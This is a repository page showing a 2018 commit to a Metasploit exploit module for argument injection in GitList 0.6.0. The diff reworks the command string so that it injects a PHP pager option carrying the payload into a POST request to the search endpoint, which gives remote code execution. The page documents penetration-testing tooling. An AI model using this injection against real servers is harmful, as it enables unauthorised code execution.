infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

removed double eval as suggested

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-07-09 13:24:31 -05:00
parent af3d2045fb
commit f5e40b14a3
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 3 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
modules/exploits/multi/http/gitlist_arg_injection.rb
View File

@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
[ 'GitList v0.6.0', { } ] [ 'GitList v0.6.0', { } ]
], ],
'Privileged' => false, 'Privileged' => false,
'Payload' => { 'BadChars' => '\'"' }, 'Payload' => { 'BadChars' => '\'' },
'DisclosureDate' => "Apr 26 2018", 'DisclosureDate' => "Apr 26 2018",
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
end end
@ -55,9 +55,9 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit def exploit
postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search') postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
cmd = '--open-files-in-pager=php -r "eval(\\"' cmd = '--open-files-in-pager=php -r "'
cmd << payload.encoded cmd << payload.encoded
cmd << '\\");"' cmd << ';"'
send_request_cgi( send_request_cgi(
'method' => 'POST', 'method' => 'POST',
'uri' => postUri, 'uri' => postUri,